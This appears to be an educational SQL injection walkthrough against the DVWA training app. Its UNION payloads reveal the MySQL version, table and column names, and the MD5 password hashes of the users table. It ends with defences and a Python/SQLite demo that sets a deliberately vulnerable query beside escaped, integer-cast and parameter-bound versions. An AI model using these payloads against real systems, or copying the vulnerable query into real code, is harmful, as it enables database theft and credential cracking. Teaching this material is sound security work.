SQL injection (SQLi) is a code injection technique that exploits a vulnerability in the database layer of an application: the injection happens inside the SQL queries the application builds. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is therefore unexpectedly executed as part of the query.
We try inserting string=>1
result :
ID: 1
First name: admin
Surname: admin
string=>2
result :
ID: 2
First name: Gordon
Surname: Brown
Now a test for injection: the quote closes the string literal and # comments out the rest of the query.
string=>2' and 1=1#
result :
ID: 2' and 1=1#
First name: Gordon
Surname: Brown
The same record comes back, so the input sits inside a quoted string in the query and the SQL we append after the quote is executed.
Now we can see the MySQL version. The UNION must select the same number of columns as the original query (two: first name and surname), and 1=0 suppresses the legitimate row so only our data is displayed.
string=>2' and 1=0 union select null, version()#
result :
ID: 2' and 1=0 union select null, version()#
First name:
Surname: 5.1.41-3ubuntu12.10
Because this is MySQL 5.x, information_schema is available, so we can map the database directly instead of falling back to blind SQL injection. Let's try it.
string=>2' and 1=0 union select null, table_name from information_schema.tables#
result (one record per table; the table name appears in the Surname field, while the ID and First name fields repeat the same values for every row and are shown once here):
ID: 2' and 1=0 union select null, table_name from information_schema.tables#
First name:
Surname: VIEWS
Surname: guestbook
Surname: users
Surname: columns_priv
Surname: db
Surname: event
We will look at the columns of the users table. 0x0a is a newline, so each Surname field shows the table name followed by the column name, one record per column.
string=>1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
result :
ID: 1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
First name:
Surname: users
user_id
Surname: users
first_name
Surname: users
last_name
Surname: users
user
Surname: users
password
Surname: users
avatar
Now we dump user_id, first_name, last_name and password from the users table, again joined with 0x0a newlines, one record per user.
string=>1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,password) from users#
result :
ID: 1' and 1=0 union select null,concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,password) from users#
First name:
Surname: 1
admin
admin
186851308742b6c91337441f5772a818
Surname: 2
Gordon
Brown
e99a18c428cb38d5f260853678922e03
Surname: 3
Hack
Me
8d3533d75ae2c3966d7e0d4fcc69216b
Surname: 4
Pablo
Picasso
0d107d09f5bbe40cade3de5c71e9e9b7
Surname: 5
Bob
Smith
5f4dcc3b5aa765d61d8327deb882cf99
The password field holds 32 hex characters, the length of an unsalted MD5 digest, so these hashes can be cracked offline with a wordlist.
To prevent our PHP web application from being tampered with through SQL injection, user input must never be able to change the structure of the MySQL query. Most SQL injection starts by inserting a quotation mark (') to break out of the string literal, so at minimum the quote has to be neutralised: escape it (in PHP, mysql_real_escape_string() for string values) and cast numeric parameters with intval() so that a value such as the user_id above can only ever be a number. Escaping only protects values that sit inside quotes; an unquoted numeric comparison is still injectable without any quote at all. The more robust fix is prepared statements (PDO or mysqli with bound parameters), which send the value separately from the SQL text so it can never be parsed as part of the query.
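The following is an added example, not code from the original post or from DVWA: it rebuilds the lookup attacked above on SQLite so it runs offline, replays the post's UNION payloads against it, and puts the vulnerable query beside the escaped, numeric-cast and parameter-bound forms described in the paragraph above. It assumes (the page does not show the PHP source) that the vulnerable query is SELECT first_name, last_name FROM users WHERE user_id = '$id', as the echoed output implies. The SQLite dialect differs from the post's MySQL payloads in three places, noted in the comments: comments end with -- instead of #, concatenation is || instead of concat(), and sqlite_master stands in for information_schema. The users rows are the ones the post dumps (only the four dumped columns are kept).

```python
"""Vulnerable vs. hardened user lookup, in the shape of the query attacked above.
Added example on SQLite; the page's target is PHP/MySQL (see lead-in)."""
import sqlite3

# Rows copied from the dump shown in the post (only the four dumped columns).
USERS = [
    (1, "admin", "admin", "186851308742b6c91337441f5772a818"),
    (2, "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
    (3, "Hack", "Me", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Pablo", "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "Bob", "Smith", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

# The post's payloads, transcribed for SQLite: '#' -> '-- ', concat() -> ||,
# 0x0a -> char(10), information_schema -> sqlite_master.
PAYLOAD_VERSION = "2' and 1=0 union select null, sqlite_version()-- "
PAYLOAD_TABLES = ("2' and 1=0 union select null, name from sqlite_master "
                  "where type='table'-- ")
PAYLOAD_COLUMNS = ("2' and 1=0 union select null, sql from sqlite_master "
                   "where name='users'-- ")
PAYLOAD_DUMP = ("1' and 1=0 union select null, user_id||char(10)||first_name"
                "||char(10)||last_name||char(10)||password from users-- ")


def connect() -> sqlite3.Connection:
    """In-memory stand-in for the dvwa database (constructed, two tables)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    conn.execute("CREATE TABLE guestbook (comment_id INTEGER, comment TEXT)")
    return conn


def lookup_vulnerable(conn, user_id: str):
    """The bug the post exploits: input is pasted into the SQL text, so a
    quote ends the literal and everything after it is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_escaped(conn, user_id: str):
    """Quote-escaping fix (what mysql_real_escape_string does for quotes):
    a quote inside a SQL literal is written as two quotes, so the whole
    payload stays one harmless string value."""
    escaped = user_id.replace("'", "''")
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{escaped}'"
    return conn.execute(sql).fetchall()


def lookup_unquoted_escaped(conn, user_id: str):
    """Caveat: the same escaping is useless when the value is not inside
    quotes. An input like 1 or 1=1 contains no quote to escape."""
    escaped = user_id.replace("'", "''")
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped}"
    return conn.execute(sql).fetchall()


def lookup_intcast(conn, user_id: str):
    """Type fix for numeric parameters (PHP intval()): anything that is not
    an integer is rejected before it reaches the query."""
    return lookup_vulnerable(conn, str(int(user_id)))


def lookup_bound(conn, user_id: str):
    """Preferred fix: a bound parameter is sent separately from the SQL
    text, so the driver never parses the value as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo() -> dict:
    """Run every variant once and return the results for inspection."""
    conn = connect()
    second = lambda rows: [r[1] for r in rows]  # the Surname column
    try:
        lookup_intcast(conn, PAYLOAD_DUMP)
        intcast_rejected = False
    except ValueError:
        intcast_rejected = True
    return {
        "version": second(lookup_vulnerable(conn, PAYLOAD_VERSION))[0],
        "tables": second(lookup_vulnerable(conn, PAYLOAD_TABLES)),
        "columns_ddl": second(lookup_vulnerable(conn, PAYLOAD_COLUMNS))[0],
        "dump": second(lookup_vulnerable(conn, PAYLOAD_DUMP)),
        "escaped": lookup_escaped(conn, PAYLOAD_DUMP),
        "unquoted_bypass": lookup_unquoted_escaped(conn, "1 or 1=1"),
        "intcast_rejected": intcast_rejected,
        "bound": lookup_bound(conn, PAYLOAD_DUMP),
        "bound_legit": lookup_bound(conn, "2"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Against lookup_vulnerable the dump payload returns all five users with the four fields newline-joined, exactly as the post's Surname field shows; against lookup_escaped and lookup_bound the same payload returns no rows, because it is compared as a single string value. lookup_unquoted_escaped shows why escaping alone is not enough: 1 or 1=1 returns every user without a single quote in the input, which is the case intval() (or binding) covers.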